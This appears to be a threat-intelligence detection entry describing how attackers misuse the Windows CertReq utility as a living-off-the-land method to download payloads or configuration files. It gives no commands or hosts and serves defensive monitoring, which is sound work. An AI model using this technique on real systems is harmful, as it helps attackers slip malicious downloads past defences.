The Reveal Platform
Intel Name: Suspicious certreq command to download
Date of Scan: November 7, 2025
Impact: High
Summary: Detects a suspicious CertReq execution that initiates a file download. This activity is commonly associated with attackers attempting to retrieve additional payloads or configuration files. CertReq is a legitimate Windows utility designed to request and obtain certificates from a Certification Authority (CA); however, it can be misused by threat actors as a living-off-the-land (LotL) technique to facilitate malicious downloads.
